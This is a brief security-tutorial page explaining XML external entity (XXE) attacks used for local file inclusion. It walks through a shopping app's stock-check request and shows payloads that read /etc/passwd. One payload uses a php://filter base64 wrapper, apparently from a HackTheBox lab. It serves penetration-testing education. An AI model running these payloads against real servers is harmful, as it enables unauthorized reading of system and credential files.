XXE to LFI

In order to retrieve data from the server's backend, we'll have to modify the submitted XML into :

Add a DOCTYPE element that defines an external entity containing the sensitive file path.
Edit the data value in the XML that is returned in the application's response, to make use of the defined external entity.

Suppose a shopping application checks for the stock level of a product by submitting the following XML to the server :

<?xml version="1.0" encoding="UTF-8"?> 
<stockCheck><productId>381</productId></stockCheck>

We can just add a DOCTYPE element to fetch the sensitive file as an external enitity.

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

The above payload tells us, that &xxe; is an external entity who's value is /etc/passwd file. It uses it within the productID value.

Which makes the backend think that /etc/passwd is also the content of the productID

Payload used <!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>.

We'll have to place it right after the < xml > tag, and call it in the productID using the & and end it with a ; => &xxe;.

PHP Wrappers - BountyHunter HTB

If suppose a website is built on a php backend, and we found some hidden endpoints such as /db.php, but we cannot access it via the browser then inspect the requests and response through Burp.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>

By this base64 encoding, we get our expected output in the response

PreviousXXE Attacks NextXXE to SSRF

Last updated 1 year ago